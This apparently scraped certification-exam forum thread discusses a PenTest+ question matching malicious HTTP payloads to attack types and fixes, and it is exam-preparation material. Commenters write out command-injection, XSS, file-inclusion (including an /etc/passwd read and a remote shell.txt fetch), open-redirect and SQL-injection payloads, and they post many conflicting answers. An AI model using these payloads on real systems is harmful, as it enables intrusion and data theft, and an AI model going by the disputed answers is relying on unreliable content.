ExamTopics Logo
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam PT0-002 All Questions

View all questions & answers for the PT0-002 exam
Go to Exam

Exam PT0-002 topic 1 question 63 discussion

Actual exam question from CompTIA's PT0-002
Question #: 63
Topic #: 1
[All PT0-002 Questions]

HOTSPOT -
You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTION -
Giving the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

Show Suggested Answer Hide Answer
Suggested Answer:
by RightAsTain at Sept. 26, 2022, 5:52 a.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
Arox08
Highly Voted 1 year, 3 months ago
whoami — cmd inj — input san (),{} Search Bob — Ref XSS — input san <> Logfile passwd00 — Local file inc. — input san sandbox Innertab — DOM XSS — input san <> Site=exaping — cmd inj — input san sandbox Redir — URL Redirect — prevent ext calls Delay — Stacked — param queries Union — Union — param queries +convert — Error — param queries Logfile…shell.txt — remote file inclusion — input san sandbox
upvoted 31 times
OnA_Mule
1 year, 2 months ago
This is the closest to being correct. My only issue is the remediation for site=exa'ping...the remediation should be Input Sanitation using an answer that has single quote. The sandbox option doesn't appear to sanitize the single quote. So I think this one should be the Input Sanitation ", ', <, :, >, -, The other one seems to start with a single quote, but I'm guessing that's supposed to be a backtick instead of a single quote.
upvoted 4 times
...
KingIT_ENG
1 year, 3 months ago
must what you think? inner Tab ===== Reflective XX
upvoted 1 times
...
KingIT_ENG
1 year, 3 months ago
Inner Tab ? not Ref XSS Search BOB ? DOM XSS
upvoted 1 times
...
[Removed]
1 year, 3 months ago
whoami -------- Cmd inj--inputsan (),{} Search Bob-----------Local file inc.---- input san sandbox Logfile passwd00 ------emote file inclusion--- input san sandbox Innertab------ Ref XSS — input san <> Site=exaping------SQL Union — param queries Redir — SQLError — param queries Delay —SQL Stacked — param queries Union ----DOM XSS — input san <> +convert — cmd inj ---input san sandbox Logfile…shell.txt-------URL Redirect — prevent ext calls This is the right answer
upvoted 2 times
yeahnodontthinkso
2 months ago
This comes straight from my school, different order than this, sorry: lookup=$(whoami) | Command Injection | Input San $,{},{} search=Bob | Reflected XSS | Input San <> #inner-tab | DOM-Based XSS | Input San <> site=www.exa'ping | Command Injection | Input San <> item=widget | SQL Stacked | Parameterized Queries logfile=fetch passwd | Local File Inclusion | Input San Sandbox logfile=httpwww.malicious-site.com | Remote File Inclusion | Input San Sandbox item=widget union select | SQL Inj Union Based | Parameterized Queries redir=http www.malicious-site.com | URL Redirect | Preventing External Calls item=widget'+convert | SQL injection Error Based | Parameterized Queries
upvoted 1 times
...
KingIT_ENG
1 year, 3 months ago
Inner Tab ? not Ref XSS Search BOB ? DOM XSS
upvoted 1 times
KingIT_ENG
1 year, 3 months ago
confused between Inner Tab and Serch BOB
upvoted 1 times
...
...
...
...
Wabs__
Highly Voted 1 year, 9 months ago
Question 7 https://www.examtopics.com/exams/comptia/pt1-002/view/
upvoted 9 times
2Fish
1 year, 4 months ago
1. Dom XSS - input san. <,> https://portswigger.net/web-security/cross-site-scripting/dom-based 2. SQLi Stacked - Parameterized Queries 3. SQLi Union - Parameterized Queries 4. Reflected XSS - input san <,> https://portswigger.net/web-security/cross-site-scripting/reflected 5. SQLi Error - Parameterized Queries https://www.indusface.com/blog/types-of-sql-injection/#Error_Based_SQL_Injection 6. CMD Injection - Input San. \ , / Sandbox 7. URL Redirect - Prevent ext. calls 8. local file inclusion - Input san. \ , / Sandbox 9. CMD Injection - input san. {,},(,) 10. Remote File Inclusion - input san. \ , /Sandbox
upvoted 1 times
[Removed]
1 year, 4 months ago
correct answer is 1. Reflected XSS - Input sanitization (<> ...) 2. Sql Injection Stacked - Parameterized Queries 3. DOM XSS - Input Sanitization (<> ...) 4. Local File Inclusion - sandbox req 5. Command Injection - sandbox req 6. SQLi union - paramtrized queries 7. SQLi error - paramtrized queries 8. Remote File Inclusion - sandbox 9. Command Injection - input saniti $ 10. URL redirect - prevent external calls
upvoted 1 times
shakevia463
1 year, 4 months ago
Reflected XSS, where the malicious script comes from the current HTTP request. Stored XSS, where the malicious script comes from the website's database. DOM-based XSS, where the vulnerability exists in client-side code rather than server-side code.
upvoted 1 times
[Removed]
1 year, 4 months ago
what is the correct answer 100% ?
upvoted 1 times
...
...
...
shakevia463
1 year, 4 months ago
The order is different on pt0-002 vs pt1-002 this is not right
upvoted 3 times
...
...
...
bracokey
Most Recent 7 months ago
lookup=$(whoami) Match: Command Injection search-Bob"%3e%3cimg%20src3da%20onerror%3dalert(1)%3e Match: DOM-based Cross Site Scripting (XSS) logfile=%2fetc%2fpasswd%00 Match: Local File Inclusion (LFI) #inner-tab"><script>alert(1)</script> Match: Reflected Cross Site Scripting (XSS) site=www.exa 'ping%20-c%2010%20localhost 'mple.com Match: Command Injection (Attempt to execute ping command) redir=http:%2f%2fwww.malicious-site.com Match: URL Redirect item=widget'; wait for%20delay20' 00:00:20';-- Match: SQL Injection (Stacked) (Attempt to use wait for and delay) item=widget%20union%20select%20null, null, @@version; -- Match: SQL Injection (Union) item=widget' +convert (int, @@version) +' Match: SQL Injection (Error) logFile-http:%2f%2fww.malicious-site.com%2fshell.txt Match: Remote File Inclusion (RFI)
upvoted 3 times
...
ciguy935yaknow
1 year, 1 month ago
Hey people so I found this online and I believe these to be the right answers. Any thoughts? https://quizlet.com/566527441/that-one-question-flash-cards/
upvoted 5 times
...
cy_analyst
1 year, 3 months ago
An answer with comments: https://www.evernote.com/shard/s8/sh/d6d72fe5-39a7-0fdd-7656-92529df14cd1/TaNnGhzwJ6NU8YRo5c-u-fYZDyZn4ld3KmejIGmWT6TgVrtPej-UBLOZAA
upvoted 2 times
OnA_Mule
1 year, 2 months ago
Your link is not valid
upvoted 1 times
...
...
KingIT_ENG
1 year, 3 months ago
I think this is the correct Command Injection - input saniti $ . DOM XSS - Input Sanitization (<> ...) Local File Inclusion - sandbox req Reflected XSS - Input sanitization (<> ...) Command Injection - sandbox req URL redirect - prevent external calls Sql Injection Stacked - Parameterized Queries . SQLi union - paramtrized queries SQLi error - paramtrized queries Remote File Inclusion - sandbox
upvoted 1 times
KingIT_ENG
1 year, 3 months ago
Inner Tab ----- Must---- Reflected XSS - Input sanitization (<> ...) Search BOB -------Must ----------DOM XSS - Input Sanitization (<> ...)
upvoted 1 times
...
...
mitrany2
1 year, 3 months ago
1. Command Injection - input saniti $ 2. Reflected XSS - Input sanitization (<> ...) 3. Local File Inclusion - sandbox req 4. DOM XSS - Input Sanitization (<> ...) 5. Command Injection - sandbox req 6. URL redirect - prevent external calls 7. Sql Injection Stacked - Parameterized Queries 8. SQLi union - paramtrized queries 9. SQLi error - paramtrized queries 10. Remote File Inclusion - sandbox
upvoted 6 times
[Removed]
1 year, 3 months ago
Command Injection - input saniti $ Local File Inclusion - sandbox req Remote File Inclusion - sandbox req Reflected XSS - Input sanitization (<> ...) SQLi union - paramtrized queries SQLi error - paramtrized queries Sql Injection Stacked - Parameterized Queries DOM XSS - Input Sanitization (<> ...) Command Injection - sandbox req URL redirect - prevent external calls
upvoted 2 times
...
[Removed]
1 year, 3 months ago
This is right answer for sure https://www.examtopics.com/user/DrChats/
upvoted 1 times
...
[Removed]
1 year, 3 months ago
Wrong this payload
upvoted 1 times
...
KingIT_ENG
1 year, 3 months ago
Inner Tab ? not Ref XSS Search BOB ? DOM XSS
upvoted 1 times
...
Load full discussion...
...
[Removed]
1 year, 3 months ago
In command injection not Parameterized Queries Parameterized Queries just for SQL
upvoted 1 times
...
[Removed]
1 year, 3 months ago
The correct answer is 1= lookup=$ (whoami) Command Injection Input Sanitization ‘,:,$,{,}(,), 2=search=Bob"%3e%3cimg%20src3da%20onerror%3dalert(1)%3e Local file inclusion Input Sanitization ..,\,/,sandbox requests 3= logfile=%2fetc%2fpasswd%00 Remot file inclusion br> &nbsp; Input Sanitization ..,\,/,sandbox requests
upvoted 1 times
OnA_Mule
1 year, 2 months ago
Not sure why you keep posting the incorrect answer. Almost all of your answers are incorrect. See Arox08 for the correct answers.
upvoted 1 times
...
[Removed]
1 year, 3 months ago
4= #inner-tab"><script>alert(1)</script> Reflected Cross Site Scripting Input Sanitization ",',<,:,>,-
upvoted 1 times
[Removed]
1 year, 3 months ago
5= site=www.exaping%20-c%2010%20localhostmple.com SQL Injection (Union) Parametrized queries
upvoted 1 times
[Removed]
1 year, 3 months ago
6 = redir=http:%2f%2fwww.malicious-site.com SQL Injection (Error) Parametrized queries
upvoted 1 times
[Removed]
1 year, 3 months ago
7 = item=widget';waitfor%20delay20'00:00:20';-- SQL Injection (Stacked) Parametrized queries
upvoted 1 times
[Removed]
1 year, 3 months ago
10= logFile=http:%2f%2fwww.malicious-site.com%2fshell.txt URL Redirect Preventing external calls
upvoted 1 times
...
Load full discussion...
...
...
...
...
...
cy_analyst
1 year, 3 months ago
this is a link that has an assessment from chatGPT about the payloads, vuln type and remediations enjoy: https://www.evernote.com/shard/s8/sh/c13cd49b-23b8-002d-88cc-2619e2b795e1/2a97bade0397f24deda20eb3f3a9a4ee
upvoted 1 times
[Removed]
1 year, 3 months ago
This is so wrong chack again
upvoted 1 times
...
...
cy_analyst
1 year, 3 months ago
lookup=$ (whoami) | Command Injection | Parametrized queries search=Bob"%3e%3cimg%20src3da%20onerror%3dalert(1)%3e | DOM-based Cross Site Scripting | Input Sanitization ",',<,:,>,- logfile=%2fetc%2fpasswd%00 | Local File Inclusion | Input Sanitization ..,,/,sandbox requests #inner-tab"><script>alert(1)</script> | Reflected Cross Site Scripting | Input Sanitization ",',<,:,>,- site=www.exaping%20-c%2010%20localhostmple.com | Command Injection | Input Sanitization ‘,:,$,{,}(,) redir=http:%2f%2fwww.malicious-site.com | URL Redirect | Input Sanitization ‘,:,$,{,}(,) item=widget';waitfor%20delay20'00:00:20';-- | SQL Injection (Stacked) | Parametrized queries item=widget%20union%20select%20null,null,@@version;-- | SQL Injection (Union) | Parametrized queries item=widget'+convert(int,@@version)+' | SQL Injection (Error) | Parametrized queries logFile-http:%2f%2fww.malicious-site.com%2fshell.txt | Remote File Inclusion | Preventing external calls
upvoted 2 times
cy_analyst
1 year, 3 months ago
I'm sharing this for a bit. This is the best answer I could get. https://www.evernote.com/shard/s8/sh/c13cd49b-23b8-002d-88cc-2619e2b795e1/Tqvp1hUjW9ZeiEwTM199g6Z6gvJnh5tFg65HJzEBqcGKdx34XNzc4vGiiw
upvoted 1 times
cy_analyst
1 year, 3 months ago
If someone need the query please ask.
upvoted 1 times
scweeb
10 months, 3 weeks ago
Can i get access?
upvoted 1 times
...
biggydanny
1 year, 2 months ago
May I please have a look at your query
upvoted 1 times
...
...
...
KingIT_ENG
1 year, 3 months ago
Your Correct but lookup=$ (whoami) | Command Injection not Parametrized queries Input Sanitization ‘,:,$,{,}(,) is Right
upvoted 3 times
...
...
[Removed]
1 year, 4 months ago
100% Correct answer i manage this questions with answer
upvoted 1 times
...
[Removed]
1 year, 4 months ago
After alot of search the correct answer is
upvoted 1 times
[Removed]
1 year, 4 months ago
lookup=$ (whoami)&nbsp;&nbsp; Command injection <br> Input Sanitization ‘,:,$,{,}(,),
upvoted 2 times
[Removed]
1 year, 4 months ago
search=Bob&quot;%3e%3cimg%20src3da%20onerror%3dalert(1)%3e&nbsp; :&nbsp; Local file inclusion : Input Sanitization ..,\,/,sandbox requests
upvoted 1 times
[Removed]
1 year, 4 months ago
logfile=%2fetc%2fpasswd%00 <br> Remot file inclusion :<br> &nbsp; Input Sanitization ..,\,/,sandbox requests
upvoted 1 times
[Removed]
1 year, 4 months ago
#inner-tab&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt; <br> Reflected Cross Site Scripting <br> &nbsp;Input Sanitization &quot;,&apos;,&lt;,:,&gt;,-,
upvoted 1 times
[Removed]
1 year, 4 months ago
logFile-http:%2f%2fww.malicious-site.com%2fshell.txt<br> URL Redirect<br> Preventing external calls
upvoted 1 times
...
Load full discussion...
...
...
...
...
...
cy_analyst
1 year, 4 months ago
For anyone who wants to use as a question for example to chatGPT or anywhere else: VULNERABILITY TYPE Command Infection DOM-based Cross Site Scripting SQL Injection (Error) SQL Injection (Stacked) SQL Injection (Union) Reflected Cross Site Scripting Local File Inclusion Remote File Inclusion URL Redirect REMEDIATION Parametrized queries Preventing external calls Input Sanitization ..,\,/,sandbox requests Input Sanitization ‘,:,$,{,}(,), Input Sanitization ",',<,:,>,-, PAYLOADS lookup=$ (whoami) search=Bob"%3e%3cimg%20src3da%20onerror%3dalert(1)%3e logfile=%2fetc%2fpasswd%00 #inner-tab"><script>alert(1)</script> site=www.exa`ping%20-c%2010%20localhost`mple.com redir=http:%2f%2fwww.malicious-site.com item=widget';waitfor%20delay20'00:00:20';-- item=widget%20union%20select%20null,null,@@version;-- item=widget'+convert(int,@@version)+' logFile-http:%2f%2fww.malicious-site.com%2fshell.txt
upvoted 4 times
[Removed]
1 year, 4 months ago
Parametrized queries is for SQL types not for command Injections
upvoted 1 times
...
[Removed]
1 year, 4 months ago
Can you sort this payload? inner tab is Reflected Cross Site Scripting search=Bob"%3e%3cimg%20src3da%20onerror%3dalert(1)%3e DOM-based Cross Site Scripting i think its right sort
upvoted 1 times
...
...
funkhaus
1 year, 4 months ago
The discussion can mess you up.. This is what I'm going with look$ - see CI $ BOB reflection >< logfile-fetch - LOCAL fi\e shell.txt - Remote fi\e script script DoubleX>< exam\\\\\ple CI union -p-union-q item-convert -p-error-q 20delay20 -p-stack-q redirect - URL redirect CALL
upvoted 1 times
funkhaus
1 year, 4 months ago
Just verified error.. I'm going with this simplified look$ - see CI $ exam\\\\\ple CI BOB DouBleX>< script script reflection >< logfile-fetch - LOCAL fi\e shell.txt - Remote fi\e redirect - URL redirect CALL union -p-union-q item-convert -p-error-q 20delay20 -p-stack-q
upvoted 2 times
[Removed]
1 year, 4 months ago
wrong this answer
upvoted 1 times
...
...
[Removed]
1 year, 4 months ago
this is 100% correct ?
upvoted 1 times
...
[Removed]
1 year, 4 months ago
Inner Tab script= must first reflectionxx
upvoted 1 times
funkhaus
1 year, 4 months ago
You are right.. so Bob would be DOM based XSS attack?
upvoted 1 times
[Removed]
1 year, 4 months ago
i add the questions numbers here and you go to every questions when i comment number here and answer to questions and i also add my answer its very help full what is your idea?
upvoted 1 times
...
[Removed]
1 year, 4 months ago
lets go on these questions to alot of comments and i add those questions number please check and share your answer and i also share my answer to help together
upvoted 1 times
...
Load full discussion...
...
...
...
Mr_BuCk3th34D
1 year, 6 months ago
1. Dom XSS - input san. <,> https://portswigger.net/web-security/cross-site-scripting/dom-based 2. SQLi Stacked - Parameterized Queries 3. SQLi Union - Parameterized Queries 4. Reflected XSS - input san <,> https://portswigger.net/web-security/cross-site-scripting/reflected 5. SQLi Error - Parameterized Queries https://www.indusface.com/blog/types-of-sql-injection/#Error_Based_SQL_Injection 6. CMD Injection - Input San. /,\ Sandbox 7. URL Redirect - Prevent ext. calls 8. local file inclusion - Input san. /,\ Sandbox 9. CMD Injection - input san. [,],(,) 10. Remote File Inclusion - input san. /,\ Sandbox
upvoted 2 times
[Removed]
1 year, 6 months ago
correct answer is 1. Reflected XSS - Input sanitization (<> ...) 2. Sql Injection Stacked - Parameterized Queries 3. DOM XSS - Input Sanitization (<> ...) 4. Local File Inclusion - sandbox req 5. Command Injection - sandbox req 6. SQLi union - paramtrized queries 7. SQLi error - paramtrized queries 8. Remote File Inclusion - sandbox 9. Command Injection - input saniti $ 10. URL redirect - prevent external calls
upvoted 2 times
biggydanny
1 year, 2 months ago
Did you finally narrow it down to this?
upvoted 1 times
OnA_Mule
1 year, 2 months ago
See Arox08 for the correct answer. I think abdulrishad is trolling since ha's posted 3 or 4 different answers over the past few months.
upvoted 1 times
...
...
...
...
RightAsTain
1 year, 9 months ago
This one is all messed up. Not sure what is what.
upvoted 5 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel